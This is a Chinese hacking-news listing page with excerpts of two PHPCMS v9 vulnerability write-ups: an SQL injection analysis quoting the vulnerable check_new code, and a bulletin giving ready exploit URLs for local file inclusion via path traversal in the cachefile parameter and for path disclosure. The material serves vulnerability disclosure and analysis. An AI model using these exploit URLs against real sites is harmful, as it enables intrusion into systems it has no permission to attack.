记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Phpcmsv9 注入0day分析

0x01 注入分析 http://0kee.360.cn/skywolf_demo/ 根据视频我得知注入来自于phpcms/modules/message/classes/message_tag.class.php中check_new函数 public function check_new(){ $where = array('send_to_id'=>$this->_username,'folder'=>'inbox','status'=>'1'); $new_count = $this->message_db->count($where); //检查是否有未查看的新系统短信 //检查该会员所在会员组 的系统公告,再查询message_data表. 是否
发布时间:2015-11-06 19:35 | 阅读:134636 | 评论:0 | 标签:PHP phpcms phpcmsv9 0day 注入 cms

漏洞播报:phpcms v9本地文件包含+爆路径漏洞

我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。 Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck #包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。 Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy #暴路径 注:请遵守国家相关法律,请勿非法入侵
发布时间:2013-04-01 22:15 | 阅读:107556 | 评论:0 | 标签:漏洞播报 phpcms v9漏洞 phpcmsv9 cms

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云